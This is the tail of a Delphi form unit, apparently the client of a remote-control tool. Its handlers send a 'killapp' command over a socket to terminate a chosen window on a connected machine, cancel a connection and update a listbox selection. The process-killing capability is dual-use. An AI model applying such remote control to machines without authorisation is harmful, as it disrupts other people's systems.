  form7.showmodal;
end;

procedure TForm1.Button31Click(Sender: TObject);
var i,j:integer;
begin
  j:=maxint;
  for i:=0 to listbox1.Items.Count-1 do begin
    if listbox1.selected[i] then begin
      client.socket.sendtext('killapp?'+inttostr(wins[i])+#13);
      j:=i; break;
    end;
  end;
  if j>listbox1.items.count then begin button6.onclick(self); status.panels[1].text:='Select window first'; exit; end;
  wait_n_receive;
  status.panels[1].text:='Terminated: '+listbox1.Items.Strings[j];
end;

procedure TForm1.Button32Click(Sender: TObject);
begin
  if connecting then begin client.Close; connecting:=false; disablecancel; client.OnDisconnect(self,client.socket); end;
  cancel:=true;
end;

procedure TForm1.ListBox1Click(Sender: TObject);
var i:integer;
begin
  for i:=0 to listbox1.items.count-1 do begin
    if listbox1.selected[i] then begin
      edit2.text:=listbox1.items.strings[i];
      exit;
    end;
  end;
end;



end.
